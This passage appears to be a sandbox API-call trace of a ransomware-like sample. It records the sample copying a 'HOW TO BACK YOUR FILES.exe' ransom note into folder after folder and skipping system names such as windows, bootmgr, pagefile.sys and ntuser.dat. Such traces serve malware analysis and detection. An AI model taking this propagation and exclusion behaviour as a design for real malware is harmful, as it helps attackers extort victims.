dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0085.433] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.433] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a70 [0085.433] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data" [0085.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df8f0 | out: hHeap=0x2b0000) returned 1 [0085.433] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0085.433] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data") returned 40 [0085.433] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data" [0085.433] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.433] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.433] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.434] GetLastError () returned 0x0 [0085.434] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.434] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.434] CloseHandle (hObject=0x120) returned 1 [0085.434] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.434] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.434] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.434] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.434] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.434] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.434] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.434] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.434] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.434] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.434] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.434] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0085.434] lstrcmpiW (lpString1="Applications", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.434] lstrcmpiW (lpString1="Applications", lpString2="aoldtz.exe") returned 1 [0085.434] lstrcmpiW (lpString1="Applications", lpString2=".") returned 1 [0085.434] lstrcmpiW (lpString1="Applications", lpString2="..") returned 1 [0085.434] lstrcmpiW (lpString1="Applications", lpString2="windows") returned -1 [0085.434] lstrcmpiW (lpString1="Applications", lpString2="bootmgr") returned -1 [0085.435] lstrcmpiW (lpString1="Applications", lpString2="temp") returned -1 [0085.435] lstrcmpiW (lpString1="Applications", lpString2="pagefile.sys") returned -1 [0085.435] lstrcmpiW (lpString1="Applications", lpString2="boot") returned -1 [0085.435] lstrcmpiW (lpString1="Applications", lpString2="ids.txt") returned -1 [0085.435] lstrcmpiW (lpString1="Applications", lpString2="ntuser.dat") returned -1 [0085.435] lstrcmpiW (lpString1="Applications", lpString2="perflogs") returned -1 [0085.435] lstrcmpiW (lpString1="Applications", lpString2="MSBuild") returned -1 [0085.435] lstrlenW (lpString="Applications") returned 12 [0085.435] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\*") returned 42 [0085.435] lstrcpyW (in: lpString1=0x2cce452, lpString2="Applications" | out: lpString1="Applications") returned="Applications" [0085.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0085.435] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2d2ef0 [0085.435] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0085.435] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c551220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.435] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.435] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0085.435] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.435] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0085.435] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0085.435] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0085.435] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0085.435] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0085.435] lstrcmpiW (lpString1="Temp", lpString2="temp") returned 0 [0085.435] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0085.435] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.435] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a70 [0085.435] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" [0085.435] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.435] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a68 | out: hHeap=0x2b0000) returned 1 [0085.435] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned 53 [0085.435] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" [0085.436] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.436] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.436] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.436] GetLastError () returned 0x0 [0085.436] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.436] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.436] CloseHandle (hObject=0x120) returned 1 [0085.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.437] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.437] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.437] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.437] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.437] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.437] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.437] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.437] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.437] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.437] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.437] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c577380, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.437] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.437] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0085.437] lstrcmpiW (lpString1="Windows", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.437] lstrcmpiW (lpString1="Windows", lpString2="aoldtz.exe") returned 1 [0085.437] lstrcmpiW (lpString1="Windows", lpString2=".") returned 1 [0085.437] lstrcmpiW (lpString1="Windows", lpString2="..") returned 1 [0085.437] lstrcmpiW (lpString1="Windows", lpString2="windows") returned 0 [0085.437] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29612a20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0085.437] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0085.437] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a50 [0085.437] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\RAC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\RAC") returned="C:\\Users\\All Users\\Microsoft\\RAC" [0085.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eeab0 | out: hHeap=0x2b0000) returned 1 [0085.437] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0085.437] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC") returned 32 [0085.437] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\RAC" | out: lpString1="C:\\Users\\All Users\\Microsoft\\RAC") returned="C:\\Users\\All Users\\Microsoft\\RAC" [0085.437] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0085.437] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\RAC\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\rac\\how to back your files.exe"), bFailIfExists=1) returned 0 [0085.438] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.438] GetLastError () returned 0x0 [0085.438] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0085.438] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0085.438] CloseHandle (hObject=0x120) returned 1 [0085.438] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0085.438] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0085.438] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\RAC\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0085.439] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.439] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0085.439] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.439] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.439] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0085.439] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0085.439] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.439] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.439] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c577380, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0085.439] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0085.439] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outbound", cAlternateFileName="")) returned 1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="aoldtz.exe") returned 1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2=".") returned 1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="..") returned 1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="windows") returned -1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="bootmgr") returned 1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="temp") returned -1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="pagefile.sys") returned -1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="boot") returned 1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="ids.txt") returned 1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="ntuser.dat") returned 1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="perflogs") returned -1 [0085.439] lstrcmpiW (lpString1="Outbound", lpString2="MSBuild") returned 1 [0085.439] lstrlenW (lpString="Outbound") returned 8 [0085.439] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC\\*") returned 34 [0085.439] lstrcpyW (in: lpString1=0x2cce442, lpString2="Outbound" | out: lpString1="Outbound") returned="Outbound" [0085.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a48 [0085.439] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x54) returned 0x2df8f0 [0085.439] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a50 | out: ListHead=0x2e7710, ListEntry=0x2e7a50) returned 0x2e7a30 [0085.439] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c59d4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c59d4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0085.439] lstrcmpiW (lpString1="PublishedData", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="aoldtz.exe") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2=".") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="..") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="windows") returned -1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="bootmgr") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="temp") returned -1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="pagefile.sys") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="boot") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="ids.txt") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="ntuser.dat") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="perflogs") returned 1 [0085.440] lstrcmpiW (lpString1="PublishedData", lpString2="MSBuild") returned 1 [0085.440] lstrlenW (lpString="PublishedData") returned 13 [0085.440] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC\\Outbound") returned 41 [0085.440] lstrcpyW (in: lpString1=0x2cce442, lpString2="PublishedData" | out: lpString1="PublishedData") returned="PublishedData" [0085.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a68 [0085.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5e) returned 0x2f1fc8 [0085.440] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a70 | out: ListHead=0x2e7710, ListEntry=0x2e7a70) returned 0x2e7a50 [0085.440] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="aoldtz.exe") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2=".") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="..") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="windows") returned -1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="bootmgr") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="temp") returned -1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="pagefile.sys") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="boot") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="ids.txt") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="ntuser.dat") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="perflogs") returned 1 [0085.440] lstrcmpiW (lpString1="StateData", lpString2="MSBuild") returned 1 [0085.440] lstrlenW (lpString="StateData") returned 9 [0085.440] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData") returned 46 [0085.440] lstrcpyW (in: lpString1=0x2cce442, lpString2="StateData" | out: lpString1="StateData") returned="StateData" [0085.440] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0085.441] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x56) returned 0x2df950 [0085.441] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0085.441] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 